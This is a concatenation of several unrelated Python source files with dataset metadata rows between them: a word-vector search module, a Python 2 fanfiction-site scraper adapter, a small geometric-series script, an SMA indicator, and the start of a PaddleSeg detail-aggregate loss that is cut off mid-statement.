    """Find the ``k`` words closest (cosine-wise) to ``word`` in a search corpus.

    ``search_words`` may be None (search the whole wordvec vocabulary), a
    predicate used to filter the vocabulary, or an explicit iterable of words.

    >>> starts_with_L = lambda x: x.startswith('l')
    >>> closest_words('mad', k=10, search_words=starts_with_L)  # doctest: +SKIP
    ['lunatic', 'loony', 'loather', ...]

    Recipe: when giving an explicit list, you may want to filter out words the
    wordvecs don't have::

        search_words = filter(lambda w: w in wordvecs, search_words)
    """
    vec_of_word = get_vec_of_word(vec_of_word)
    target_vec = vec_of_word[word]
    if search_words is None:
        candidates = vec_of_word  # everything we have in vec_of_word
    elif isinstance(search_words, Callable):
        candidates = filter(search_words, vec_of_word)
    else:
        candidates = search_words
    assert isinstance(candidates, Iterable), (
        'search_words should None, an iterable or a filter ' 'function'
    )
    scored = ((w, vec_of_word[w]) for w in candidates)
    # nlargest on the *negated* distance == the k closest words.
    closest = nlargest(k, scored, key=lambda wv: -cosine(target_vec, wv[1]))
    return [wv[0] for wv in closest]
def word_frequency_streams_of_zip():
    """Open the bundled english-word-frequency zip as a store of line streams."""
    zip_path = str(word_frequency_posixpath)
    return FileStreamsOfZip(zip_path)
@lru_cache(maxsize=1)
def most_frequent_words(max_n_words=100_000):
    """The set of the ``max_n_words`` most frequent words (cached).

    Note: Twice faster than using FilesOfZip and pandas.read_csv
    """
    zip_store = word_frequency_streams_of_zip()
    with zip_store['unigram_freq.csv'] as lines:
        top_lines = islice(lines, 0, max_n_words)
        return {line.decode().split(',')[0] for line in top_lines}
def word_frequencies():
    """Yield ``(word, count)`` pairs from the bundled frequency CSV,
    skipping the header row."""
    zip_store = word_frequency_streams_of_zip()
    with zip_store['unigram_freq.csv'] as lines:
        next(lines)  # drop the "word,count" header
        for raw_line in lines:
            word, freq = raw_line.strip().decode().split(',')
            yield word, int(freq)
def get_english_word2vec_zip_filepath():
    """Return the local path of the English fastText vectors zip,
    announcing a download (via the graze cache) the first time."""
    from graze import Graze

    g = Graze()
    if english_word2vec_url not in g:
        print(
            f'Downloading {english_word2vec_url} and storing it locally '
            f'(in {g.filepath_of(english_word2vec_url)})'
        )
    return g.filepath_of(english_word2vec_url)
def line_to_raw_word_vec(line, encoding='utf-8', errors='strict'):
    """Split one ``.vec`` byte line into ``(decoded_word, raw_vector_bytes)``."""
    token, raw_vec = line.split(maxsplit=1)
    return token.decode(encoding, errors), raw_vec
skip_one_item = partial(PreIter().skip_items, n=1)
class WordRawVecCreek(Creek):
    """Creek over a ``.vec`` byte stream yielding (word, raw-vector-bytes) pairs.

    Skips the first line (presumably the fastText "<n_lines> <n_dims>" header).
    """
    pre_iter = staticmethod(skip_one_item)
    data_to_obj = staticmethod(line_to_raw_word_vec)
class WordVecCreek(Creek):
    """Creek over a ``.vec`` byte stream yielding (word, numpy-vector) pairs."""

    def __init__(self, stream, word_filt=None):
        super().__init__(stream)
        if not callable(word_filt):
            # NOTE(review): wrapping a non-callable in partial(filter, word_filt)
            # means self.word_filt(word) below returns a filter *object*, which
            # is always truthy -- so non-callables (incl. None) effectively
            # disable filtering. That happens to be right for None; confirm no
            # caller passes a collection here expecting membership filtering.
            word_filt = partial(filter, word_filt)
        self.word_filt = word_filt

    def pre_iter(self, stream):
        next(stream)  # consume the first line (it's a header)
        return filter(
            lambda wv: self.word_filt(wv[0]), map(line_to_raw_word_vec, stream)
        )  # split word and vec

    # Parse the space-separated text vector into a numpy array.
    # NOTE(review): np.fromstring(..., sep=' ') is deprecated but functional.
    data_to_obj = staticmethod(lambda wv: (wv[0], np.fromstring(wv[1], sep=' ')))
class WordVecsOfZip(Store.wrap(FileStreamsOfZip)):
    """Zip-backed store whose values are WordVecCreek streams of (word, vec) pairs."""
    _obj_of_data = staticmethod(WordVecCreek)
def english_word2vec_stream(
    word_filt=None, zip_filepath=None, key='wiki-news-300d-1M-subword.vec'
):
    """Stream (word, vector) pairs from the English fastText zip,
    optionally filtered by ``word_filt`` (downloads the zip on first use)."""
    path = zip_filepath or get_english_word2vec_zip_filepath()
    raw_line_stream = FileStreamsOfZip(path)[key]
    return WordVecCreek(raw_line_stream, word_filt)
def word_and_vecs(fp):
    """Yield ``(token, float_tuple)`` pairs from a ``.vec``-style byte stream.

    Note: the fastText "<n_lines> <n_dims>" header, if present, is NOT
    consumed here -- strip it upstream if needed.
    """
    for raw_line in fp:
        parts = raw_line.decode().rstrip().split(' ')
        yield parts[0], tuple(float(p) for p in parts[1:])
Vec = np.ndarray
VecStore = Mapping[Any, Vec]
WordVecStore = Mapping[str, Vec]
def mk_tokenizer(tokenizer):
    """Coerce a regex (string or compiled pattern) into a findall-based
    tokenizer function; anything else is passed through unchanged."""
    if not isinstance(tokenizer, (str, re.Pattern)):
        return tokenizer
    compiled = re.compile(tokenizer)

    def _tokenize(string: str):
        return compiled.findall(string)

    return _tokenize
alpha_num_p = re.compile(r'[\w-]+')
letters_p = re.compile(r'[a-z]+')
#
# def keys_and_vals_of_coll(coll):
# if isinstance(coll, Mapping):
# return zip(*coll.items())
# else:
# return zip(*enumerate(coll))
# class FakeMapping:
# def __init__(self, coll):
# self.coll = coll
#
# def values(self):
# if isinstance(coll, Mapping):
# return coll.items()
# else:
# return enumerate(coll)
#
# def keys(self):
# if isinstance(coll, Mapping):
# return coll.items()
# else:
# return enumerate(coll)
def cosine(x, y):
    """Cosine distance (1 - cosine similarity) between two vectors."""
    return cosine_distances([x], [y])[0][0]
@lru_cache(maxsize=1)
def vec_of_word_default_factory():
    """Default WordVec store: vectors for the most frequent English words (cached)."""
    frequent = most_frequent_words()
    return dict(english_word2vec_stream(word_filt=frequent.__contains__))
@lru_cache(maxsize=1)
def _get_vec_of_word(corpus):
if isinstance(corpus, str):
if corpus == 'most_frequent_english':
words = most_frequent_words()
return dict(english_word2vec_stream(word_filt=words.__contains__))
elif corpus == 'english_all':
dict(english_word2vec_stream())
raise ValueError(f'Unrecognized corpus value: {corpus}')
DFLT_WORDVEC_CORPUS_NAME = 'most_frequent_english'

# User-facing corpus names mapped to the canonical names _get_vec_of_word knows.
word_to_vec_corpus_aliases = {
    'most_frequent_english': 'most_frequent_english',
    'most_frequent': 'most_frequent_english',
    'english_70982': 'most_frequent_english',
    'english_all': 'english_all',
    'english_999994': 'english_all',
}


def get_vec_of_word(corpus=DFLT_WORDVEC_CORPUS_NAME):
    """Get a word->vector dict given an alias name (or pass a mapping through).

    :param corpus: None (use the default corpus), a corpus alias string, or an
        already-built word->vector Mapping (returned as-is).
    :raises ValueError: for an unrecognized alias string.

    Fixes over the previous revision: the looked-up dict is now actually
    returned (every string branch used to fall through to ValueError), the
    'english_all' aliases resolve to 'english_all' instead of
    'most_frequent_english', and a non-string corpus is returned as-is
    instead of silently returning None.
    """
    if corpus is None:
        corpus = DFLT_WORDVEC_CORPUS_NAME
    if isinstance(corpus, str):
        try:
            canonical_name = word_to_vec_corpus_aliases[corpus]
        except KeyError:
            raise ValueError(f'Unrecognized corpus value: {corpus}')
        return _get_vec_of_word(canonical_name)
    return corpus  # assumed to already be a word->vector Mapping
@dataclass
class WordVec(Mapping):
    """Word-vector store with query-to-vector aggregation.

    Terms:
    - query: anything (usually a string) that can be fed to tokenizer to produce a list of tokens
    - words: tokens that are contained in the vec_of_word Mapping (keys)
    - vec: a vector (from the same space as vec_of_word values), used as a fingerprint
      of a query (through its tokenization and a formula on the corresponding words' vectors)

    Notes:
    - If using a non-dict vec_of_word mapping, make sure the __contains__ is
      efficient, or processing will be slow.

    ```
    w = WordVec(vec_of_word=wv)
    assert w.dist('france capital', 'paris') < w.dist('france capital', 'rome')
    assert w.dist('italy capital', 'rome') < w.dist('italy capital', 'paris')
    ```
    """
    # Mapping of word -> vector; defaults to the most frequent English words.
    vec_of_word: WordVecStore = field(
        default_factory=vec_of_word_default_factory, repr=False
    )
    # Deliberately *not* annotated (so it is not a dataclass field): a regex
    # string that __post_init__ turns into a tokenizer callable.
    tokenizer = r'[\w-]+'

    def __post_init__(self):
        # Replace the class-level pattern with an instance-level callable.
        self.tokenizer = mk_tokenizer(self.tokenizer)

    def dist(self, q1, q2):
        """Cosine distance between two queries (through their corresponding vectors)"""
        return cosine(self.query_to_vec(q1), self.query_to_vec(q2))

    def query_to_vec(self, query):
        """The vector computed from a query (process is query->tokens->words->vecs->mean).
        Note that a query that leads to an empty list of words will result in the
        global_mean fallback (the sum of all vectors in vec_of_word).
        """
        words = self.query_2_words(query)
        return self.mean_vec(words)

    def query_to_vec_matrix(self, query):
        """Matrix of per-word vectors for the query's known words."""
        words = self.query_2_words(query)
        return self.vec_matrix(words)

    def mean_vec(self, words):
        """Mean of the words' vectors; falls back to global_mean when empty."""
        if len(words) > 0:
            # Defensive: drop None rows (query_2_words should already have
            # filtered unknown words, so this is a belt-and-braces check).
            vectors = list(filter(lambda v: v is not None, self.vec_matrix(words)))
            if len(vectors) > 0:
                return np.mean(vectors, axis=0)
        return self.global_mean  # if all else fails

    def query_2_words(self, query):
        """Tokenize the query, keeping only tokens present in vec_of_word."""
        return [tok for tok in self.tokenizer(query) if tok in self.vec_of_word]

    @cached_property
    def global_mean(self):
        # Despite the name, this is the *sum* of all vectors. It points in the
        # same direction as the mean (mean = sum / N), so cosine-based uses
        # are unaffected by the scale difference -- but note the discrepancy
        # if magnitude ever matters.
        return np.sum(list(self.vec_of_word.values()), axis=0)
        # return np.mean(list(self.vec_of_word.values()), axis=0)

    def vec_matrix(self, words):
        # .get(w, None) so unknown words produce None entries (filtered in mean_vec).
        return np.array([self.vec_of_word.get(w, None) for w in words])

    def __repr__(self):
        tokenizer_name = getattr(self.tokenizer, '__name__', 'unnamed_tokenizer')
        return (
            f'{self.__class__.__name__}('
            f'vec_of_word={type(self.vec_of_word).__name__} with {len(self.vec_of_word)} words, '
            f'tokenizer={tokenizer_name})'
        )

    # Calling the instance vectorizes a query.
    __call__ = query_to_vec

    # Mapping interface: delegate straight to vec_of_word.
    # TODO: Replace with "explicit" decorator
    def __getitem__(self, k):
        return self.vec_of_word[k]

    def __len__(self):
        return len(self.vec_of_word)

    def __contains__(self, k):
        return k in self.vec_of_word

    def __iter__(self):
        return iter(self.vec_of_word)
Corpus = Optional[Union[Mapping, Iterable]]


class WordVecSearch:
    """Make a search engine.

    Fits a cosine k-NN index on the vectors of a corpus (or of the word_vec's
    own vocabulary) and returns the corpus keys closest to a query.
    """

    corpus_ = None  # Mapping key -> searchable value, set by fit()
    corpus_keys_array_ = None  # np.array of corpus keys, aligned with the knn index

    def __init__(self, word_vec: WordVec = None, n_neighbors=10, **knn_kwargs):
        """
        :param word_vec: A WordVec object used to vectorize corpus values and queries.
        :param n_neighbors: number of results returned per search.
        :param knn_kwargs: extra keyword arguments forwarded to sklearn NearestNeighbors.
        """
        word_vec = word_vec or WordVec()
        self.word_vec = word_vec
        knn_kwargs = dict(n_neighbors=n_neighbors, metric='cosine', **knn_kwargs)
        self.knn = NearestNeighbors(**knn_kwargs)

    def fit(self, corpus: Corpus = None):
        """Fit on the given corpus

        :param corpus: A Mapping or iterable whose values we will fit on
            - corpus values must be valid self.word_vec arguments (usually strings)
            - corpus keys (or indices, if corpus wasn't a Mapping) will be used in results of search
            - if not specified, will default to word_vec keys
        """
        if corpus is None:  # if corpus is not given, use word_vec as the corpus
            words = self.word_vec.vec_of_word.keys()
            corpus = dict(zip(words, words))
        elif not isinstance(corpus, Mapping):
            corpus = dict(enumerate(corpus))
        self.corpus_ = corpus
        # Fix: vectorize the corpus *values* (the searchable documents), not its
        # keys. Iterating a Mapping yields keys, which for a plain-iterable
        # corpus are ints and would crash in the tokenizer (and for a real
        # Mapping would index the wrong thing, contrary to the docstring).
        vecs = np.array(list(map(self.word_vec, self.corpus_.values())))
        self.knn.fit(vecs)
        self.corpus_keys_array_ = np.array(list(self.corpus_.keys()))
        return self

    def search(self, query, include_dist=False):
        """Return the keys of the nearest corpus entries (optionally with distances)."""
        try:
            query_vec = self.word_vec(query)
            r_dist, r_idx = self.knn.kneighbors(query_vec.reshape(1, -1))
            corpus_keys = self.corpus_keys_array_[r_idx]
            if not include_dist:
                return corpus_keys
            else:
                return corpus_keys, r_dist
        except NotFittedError:
            self._when_searched_on_unfit_instance()
            # Fix: the retried search's result was previously dropped, so the
            # first call on an unfit instance always returned None.
            return self.search(query, include_dist)

    def _when_searched_on_unfit_instance(self):
        """Warn, then fit on the wordvec's own vocabulary as a fallback."""
        from warnings import warn

        warn(
            "The search object wasn't fitted yet, so I'm fitting it on the "
            'wordvec data itself. '
            'To avoid this message, do a .fit() before using the search '
            'functionality.'
        )
        return self.fit()

    __call__ = search
class StreamsOfZip(FileStreamsOfZip):
    # NOTE(review): applies line_to_raw_word_vec to whatever datum the base
    # store yields; assumes each datum is a single wordvec byte line -- TODO
    # confirm against FileStreamsOfZip semantics.
    def _obj_of_data(self, data):
        return line_to_raw_word_vec(data)
class SearchOld:
    """Legacy wordvec k-NN search engine (kept for reference).

    Example:
    ```
    zip_filepath = '/D/Dropbox/_odata/misc/wiki-news-300d-1M-subword.vec.zip'
    import pandas as pd
    df = pd.read_excel('/Users/twhalen/Downloads/pypi package names.xlsx')
    target_words = set(df.word)
    from grub.examples.pypi import Search
    s = Search(zip_filepath, search_words=target_words)
    s.search('search for the right name')
    ```
    """
    # Pattern method used to split queries into word tokens.
    tokenizer = re.compile(r'\w+').findall

    def __init__(
        self,
        wordvec_zip_filepath=None,
        search_words=None,
        wordvec_name_in_zip='wiki-news-300d-1M-subword.vec',
        n_neighbors=37,
        verbose=False,
    ):
        # Default to the (downloaded-on-demand) English fastText vectors zip.
        self.wordvec_zip_filepath = (
            wordvec_zip_filepath or get_english_word2vec_zip_filepath()
        )
        self.wordvec_name_in_zip = wordvec_name_in_zip
        if search_words:
            # A set gives O(1) membership tests in the knn property below.
            search_words = set(search_words)
        self.search_words = search_words
        self.n_neighbors = n_neighbors
        self.verbose = verbose

    @cached_property
    def stream(self):
        """Zip-backed store of raw wordvec line streams (opened lazily, once)."""
        return StreamsOfZip(self.wordvec_zip_filepath)

    @cached_property
    def wordvecs(self):
        """Full word -> vector-tuple dict, loaded from the zip on first access."""
        if self.verbose:
            print('Gathering all the word vecs. This could take a few minutes...')
        with self.stream[self.wordvec_name_in_zip] as fp:
            all_wordvecs = dict(word_and_vecs(fp))
        return all_wordvecs

    def filtered_wordvecs(self, tok_filt):
        """Stream (word, vec) pairs whose word satisfies ``tok_filt``."""
        with self.stream[self.wordvec_name_in_zip] as fp:
            yield from filter(lambda x: tok_filt(x[0]), word_and_vecs(fp))

    def vec_matrix(self, words):
        # .get(w, None): unknown words produce None rows.
        return np.array([self.wordvecs.get(w, None) for w in words])

    def mean_vec(self, words):
        # NOTE(review): unlike WordVec.mean_vec, None rows from unknown words
        # are NOT filtered here, so np.mean can fail on out-of-vocabulary
        # tokens -- confirm callers only pass known words.
        return np.mean(self.vec_matrix(words), axis=0)

    def query_to_vec(self, query):
        """Vectorize a query as the mean of its tokens' vectors."""
        tokens = self.tokenizer(query)
        return self.mean_vec(tokens)

    def query_to_vec_matrix(self, query):
        """Matrix of per-token vectors for a query."""
        tokens = self.tokenizer(query)
        return self.vec_matrix(tokens)

    @cached_property
    def knn(self):
        """Cosine NearestNeighbors index fitted on the search_words' vectors."""
        target_wv = dict(self.filtered_wordvecs(lambda x: x in self.search_words))
        X = np.array(list(target_wv.values()))
        knn = NearestNeighbors(n_neighbors=self.n_neighbors, metric='cosine').fit(X)
        # Keep the words alongside the index so results can be mapped back.
        knn.words = np.array(list(target_wv.keys()))
        return knn

    def search(self, query):
        """Return the words of the nearest neighbors of the query vector."""
        query_vec = self.query_to_vec(query)
        r_dist, r_idx = self.knn.kneighbors(query_vec.reshape(1, -1))
        return self.knn.words[r_idx]
| 30.79572 | 119 | 0.660118 |
736f992e46d46718781517fc7d240e27e520ce3d | 11,134 | py | Python | fanficdownloader/adapters/adapter_onedirectionfanfictioncom.py | rodrigonz/rodrigodeoliveiracosta-clone | 5fb6d2a167e24199f8080ba78392821659575685 | [
"Apache-2.0"
] | null | null | null | fanficdownloader/adapters/adapter_onedirectionfanfictioncom.py | rodrigonz/rodrigodeoliveiracosta-clone | 5fb6d2a167e24199f8080ba78392821659575685 | [
"Apache-2.0"
] | null | null | null | fanficdownloader/adapters/adapter_onedirectionfanfictioncom.py | rodrigonz/rodrigodeoliveiracosta-clone | 5fb6d2a167e24199f8080ba78392821659575685 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2012 Fanficdownloader team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import time
import logging
logger = logging.getLogger(__name__)
import re
import urllib2
from .. import BeautifulSoup as bs
from ..htmlcleanup import stripHTML
from .. import exceptions as exceptions
from base_adapter import BaseSiteAdapter, makeDate
def getClass():
    """Return the adapter class defined in this module."""
    return OneDirectionFanfictionComAdapter
# Class name has to be unique. Our convention is camel case the
# sitename with Adapter at the end. www is skipped.
class OneDirectionFanfictionComAdapter(BaseSiteAdapter):
    """eFiction-style adapter for onedirectionfanfiction.com (Python 2 code).

    Scrapes story metadata and chapter text from the site's viewstory.php
    pages, logging in and acknowledging the adult-content warning when needed.
    """

    def __init__(self, config, url):
        BaseSiteAdapter.__init__(self, config, url)
        self.decode = ["Windows-1252",
                       "utf8"] # 1252 is a superset of iso-8859-1.
                               # Most sites that claim to be
                               # iso-8859-1 (and some that claim to be
                               # utf8) are really windows-1252.
        self.username = "NoneGiven" # if left empty, site doesn't return any message at all.
        self.password = ""
        self.is_adult=False
        # get storyId from url--url validation guarantees query is only sid=1234
        self.story.setMetadata('storyId',self.parsedUrl.query.split('=',)[1])
        logger.debug("storyId: (%s)"%self.story.getMetadata('storyId'))
        # normalized story URL.
        self._setURL('http://' + self.getSiteDomain() + '/viewstory.php?sid='+self.story.getMetadata('storyId'))
        # Each adapter needs to have a unique site abbreviation.
        self.story.setMetadata('siteabbrev','odf')
        # The date format will vary from site to site.
        # http://docs.python.org/library/datetime.html#strftime-strptime-behavior
        self.dateformat = "%m/%d/%y"

    @staticmethod # must be @staticmethod, don't remove it.
    def getSiteDomain():
        # The site domain. Does have www here, if it uses it.
        return 'onedirectionfanfiction.com'

    @classmethod
    def getAcceptDomains(cls):
        """Domains (with and without www) this adapter claims."""
        return ['www.onedirectionfanfiction.com','onedirectionfanfiction.com']

    def getSiteExampleURLs(self):
        """Example story URL shown to users."""
        return "http://"+self.getSiteDomain()+"/viewstory.php?sid=1234"

    def getSiteURLPattern(self):
        """Regex matching valid story URLs for this site."""
        return re.escape("http://")+"(www\.)?"+re.escape(self.getSiteDomain()+"/viewstory.php?sid=")+r"\d+$"

    ## Login seems to be reasonably standard across eFiction sites.
    def needToLoginCheck(self, data):
        """True when the fetched page demands an account or rejects credentials."""
        if 'Registered Users Only' in data \
                or 'There is no such account on our website' in data \
                or "That password doesn't match the one in our database" in data:
            return True
        else:
            return False

    def performLogin(self, url):
        """POST login credentials; raise FailedToLogin when the site rejects them."""
        params = {}
        if self.password:
            params['penname'] = self.username
            params['password'] = self.password
        else:
            params['penname'] = self.getConfig("username")
            params['password'] = self.getConfig("password")
        params['cookiecheck'] = '1'
        params['submit'] = 'Submit'
        loginUrl = 'http://' + self.getSiteDomain() + '/user.php?action=login'
        logger.debug("Will now login to URL (%s) as (%s)" % (loginUrl,
                                                             params['penname']))
        d = self._fetchUrl(loginUrl, params)
        if "Member Account" not in d : #Member Account
            logger.info("Failed to login to URL %s as %s" % (loginUrl,
                                                             params['penname']))
            raise exceptions.FailedToLogin(url,params['penname'])
            return False  # unreachable after the raise; kept from the original
        else:
            return True

    ## Getting the chapter list and the meta data, plus 'is adult' checking.
    def extractChapterUrlsAndMetadata(self):
        """Fetch the story index page and populate metadata and chapterUrls."""
        if self.is_adult or self.getConfig("is_adult"):
            # Weirdly, different sites use different warning numbers.
            # If the title search below fails, there's a good chance
            # you need a different number. print data at that point
            # and see what the 'click here to continue' url says.
            addurl = "&ageconsent=ok&warning=4"
        else:
            addurl=""
        # index=1 makes sure we see the story chapter index. Some
        # sites skip that for one-chapter stories.
        url = self.url+'&index=1'+addurl
        logger.debug("URL: "+url)
        try:
            data = self._fetchUrl(url)
        except urllib2.HTTPError, e:
            if e.code == 404:
                raise exceptions.StoryDoesNotExist(self.url)
            else:
                raise e
        if self.needToLoginCheck(data):
            # need to log in for this one.
            self.performLogin(url)
            data = self._fetchUrl(url)
        # The actual text that is used to announce you need to be an
        # adult varies from site to site. Again, print data before
        # the title search to troubleshoot.
        if "Age Consent Required" in data:
            raise exceptions.AdultCheckRequired(self.url)
        if "Access denied. This story has not been validated by the adminstrators of this site." in data:
            raise exceptions.FailedToDownload(self.getSiteDomain() +" says: Access denied. This story has not been validated by the adminstrators of this site.")
        # use BeautifulSoup HTML parser to make everything easier to find.
        soup = bs.BeautifulSoup(data)
        # Now go hunting for all the meta data and the chapter list.
        ## Title
        a = soup.find('a', href=re.compile(r'viewstory.php\?sid='+self.story.getMetadata('storyId')+"$"))
        self.story.setMetadata('title',a.string)
        # Find authorid and URL from... author url.
        a = soup.find('a', href=re.compile(r"viewuser.php\?uid=\d+"))
        self.story.setMetadata('authorId',a['href'].split('=')[1])
        self.story.setMetadata('authorUrl','http://'+self.host+'/'+a['href'])
        self.story.setMetadata('author',a.string)
        # Find the chapters:
        for chapter in soup.findAll('a', href=re.compile(r'viewstory.php\?sid='+self.story.getMetadata('storyId')+"&chapter=\d+$")):
            # just in case there's tags, like <i> in chapter titles.
            self.chapterUrls.append((stripHTML(chapter),'http://'+self.host+'/'+chapter['href']+addurl))
        self.story.setMetadata('numChapters',len(self.chapterUrls))
        # eFiction sites don't help us out a lot with their meta data
        # formating, so it's a little ugly.
        # utility method
        def defaultGetattr(d,k):
            try:
                return d[k]
            except:
                return ""
        # <span class="label">Rated:</span> NC-17<br /> etc
        labels = soup.findAll('span',{'class':'label'})
        for labelspan in labels:
            value = labelspan.nextSibling
            label = labelspan.string
            if 'Summary' in label:
                ## Everything until the next span class='label'
                svalue = ""
                while not defaultGetattr(value,'class') == 'label':
                    svalue += str(value)
                    value = value.nextSibling
                self.setDescription(url,svalue)
            if 'Rated' in label:
                self.story.setMetadata('rating', value)
            if 'Word count' in label:
                self.story.setMetadata('numWords', value)
            if 'Categories' in label:
                cats = labelspan.parent.findAll('a',href=re.compile(r'browse.php\?type=categories'))
                for cat in cats:
                    self.story.addToList('category',cat.string)
            if 'Characters' in label:
                chars = labelspan.parent.findAll('a',href=re.compile(r'browse.php\?type=characters'))
                for char in chars:
                    self.story.addToList('characters',char.string)
            if 'Warnings' in label:
                warnings = labelspan.parent.findAll('a',href=re.compile(r'browse.php\?type=class&type_id=6'))
                for warning in warnings:
                    self.story.addToList('warnings',warning.string)
            if 'Completed' in label:
                if 'Yes' in value:
                    self.story.setMetadata('status', 'Completed')
                else:
                    self.story.setMetadata('status', 'In-Progress')
            if 'Published' in label:
                self.story.setMetadata('datePublished', makeDate(stripHTML(value), self.dateformat))
            if 'Updated' in label:
                # there's a stray [ at the end.
                #value = value[0:-1]
                self.story.setMetadata('dateUpdated', makeDate(stripHTML(value), self.dateformat))
        try:
            # Find Series name from series URL.
            a = soup.find('a', href=re.compile(r"viewseries.php\?seriesid=\d+"))
            series_name = a.string
            series_url = 'http://'+self.host+'/'+a['href']
            # use BeautifulSoup HTML parser to make everything easier to find.
            seriessoup = bs.BeautifulSoup(self._fetchUrl(series_url))
            storyas = seriessoup.findAll('a', href=re.compile(r'^viewstory.php\?sid=\d+$'))
            i=1
            for a in storyas:
                if a['href'] == ('viewstory.php?sid='+self.story.getMetadata('storyId')):
                    self.setSeries(series_name, i)
                    break
                i+=1
        except:
            # I find it hard to care if the series parsing fails
            pass

    # grab the text for an individual chapter.
    def getChapterText(self, url):
        """Fetch a chapter page and return the cleaned-up story div's HTML."""
        logger.debug('Getting chapter text from: %s' % url)
        soup = bs.BeautifulStoneSoup(self._fetchUrl(url),
                                     selfClosingTags=('br','hr')) # otherwise soup eats the br/hr tags.
        div = soup.find('div', {'id' : 'story'})
        if None == div:
            raise exceptions.FailedToDownload("Error downloading Chapter: %s! Missing required element!" % url)
        return self.utf8FromSoup(url,div)
| 41.544776 | 162 | 0.567451 |
0e8e2f62ad1eee63c82df8f5cbc9a516f2de689f | 369 | py | Python | code/LTI/Basics/sum_series.py | chipmuenk/acoustics | c85ac95a10c09d7fa15d63b2bdb24acab89fec60 | [
"MIT"
] | null | null | null | code/LTI/Basics/sum_series.py | chipmuenk/acoustics | c85ac95a10c09d7fa15d63b2bdb24acab89fec60 | [
"MIT"
] | null | null | null | code/LTI/Basics/sum_series.py | chipmuenk/acoustics | c85ac95a10c09d7fa15d63b2bdb24acab89fec60 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Berechne endliche geometrische Reihe für a = 0.5 und N = 10
Drucke Ergebnisse mit Formatierung
Author: Christian Muenker
"""
summe = 0
for i in range(0,10):
summe += 0.5**i
# alte Syntax
print('i = %2d, Teilsumme: %f' %(i, summe))
# Python 3 Syntax
print('i = {0:2d}, Teilsumme: {1:f}'.format(i, summe))
print(summe) | 20.5 | 59 | 0.609756 |
daffd2440350b91ff68f9650e8e347e5fb4a70d4 | 885 | py | Python | app/analyzers/informants/sma.py | ferreiramarcelo/telegram-crypto-signals | 321d9305de5b98cc1c70bec293cafd0ce7432db3 | [
"MIT"
] | 1,857 | 2020-09-03T16:15:27.000Z | 2022-03-31T23:08:43.000Z | app/analyzers/informants/sma.py | ExBotTrader/Crypto-Signal | 7c6871baa5023e0e4cc14f4cd5ae10ac5592698d | [
"MIT"
] | 154 | 2018-02-26T12:37:57.000Z | 2020-08-26T13:06:08.000Z | app/analyzers/informants/sma.py | ExBotTrader/Crypto-Signal | 7c6871baa5023e0e4cc14f4cd5ae10ac5592698d | [
"MIT"
] | 535 | 2020-09-04T22:49:14.000Z | 2022-03-27T16:52:07.000Z | """ SMA Indicator
"""
import math
import pandas
from talib import abstract
from analyzers.utils import IndicatorUtils
class SMA(IndicatorUtils):
    """Simple-moving-average informant built on TA-Lib."""

    def analyze(self, historical_data, period_count=15):
        """Performs a SMA analysis on the historical data.

        Args:
            historical_data (list): A matrix of historical OHCLV data.
            period_count (int, optional): Defaults to 15. The number of data
                points to consider for our simple moving average.

        Returns:
            pandas.DataFrame: A dataframe containing the indicator values.
        """
        df = self.convert_to_dataframe(historical_data)
        result = abstract.SMA(df, period_count).to_frame()
        result.dropna(how='all', inplace=True)
        result.rename(columns={0: 'sma'}, inplace=True)
        return result
| 28.548387 | 99 | 0.674576 |
24cde37eb1ae79fbf681c48181203b5742565388 | 5,709 | py | Python | paddlers/models/ppseg/models/losses/detail_aggregate_loss.py | huilin16/PaddleRS | ca0d6223d8e56cd3bd3cbd3a033c89f1718ce26a | [
"Apache-2.0"
] | 40 | 2022-02-28T02:07:28.000Z | 2022-03-31T09:54:29.000Z | paddlers/models/ppseg/models/losses/detail_aggregate_loss.py | huilin16/PaddleRS | ca0d6223d8e56cd3bd3cbd3a033c89f1718ce26a | [
"Apache-2.0"
] | 5 | 2022-03-15T12:13:33.000Z | 2022-03-31T15:54:08.000Z | paddlers/models/ppseg/models/losses/detail_aggregate_loss.py | huilin16/PaddleRS | ca0d6223d8e56cd3bd3cbd3a033c89f1718ce26a | [
"Apache-2.0"
] | 20 | 2022-02-28T02:07:31.000Z | 2022-03-31T11:40:40.000Z | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from paddlers.models.ppseg.cvlibs import manager
@manager.LOSSES.add_component
class DetailAggregateLoss(nn.Layer):
    """
    DetailAggregateLoss's implementation based on PaddlePaddle.
    The original article refers to Meituan
    Fan, Mingyuan, et al. "Rethinking BiSeNet For Real-time Semantic Segmentation."
    (https://arxiv.org/abs/2104.13188)
    Args:
        ignore_index (int64, optional): Specifies a target value that is ignored
            and does not contribute to the input gradient. Default ``255``.
    """

    def __init__(self, ignore_index=255):
        super(DetailAggregateLoss, self).__init__()
        self.ignore_index = ignore_index
        # 3x3 Laplacian kernel (all -1 around a center 8): an edge detector
        # applied to the label map to extract boundary targets.
        self.laplacian_kernel = paddle.to_tensor(
            [-1, -1, -1, -1, 8, -1, -1, -1, -1], dtype='float32').reshape(
                (1, 1, 3, 3))
        # Learnable 1x3x1x1 conv weights fusing the stacked boundary maps.
        self.fuse_kernel = paddle.create_parameter(
            [1, 3, 1, 1], dtype='float32')

    def forward(self, logits, label):
        """
        Args:
            logits (Tensor): Logit tensor, the data type is float32, float64. Shape is
                (N, C), where C is number of classes, and if shape is more than 2D, this
                is (N, C, D1, D2,..., Dk), k >= 1.
            label (Tensor): Label tensor, the data type is int64. Shape is (N), where each
                value is 0 <= label[i] <= C-1, and if shape is more than 2D, this is
                (N, D1, D2,..., Dk), k >= 1.
        Returns: loss
        """
        # Boundary map at full resolution: edge-detect the label map, then
        # binarize (threshold 0.1) into a float mask.
        boundary_targets = F.conv2d(
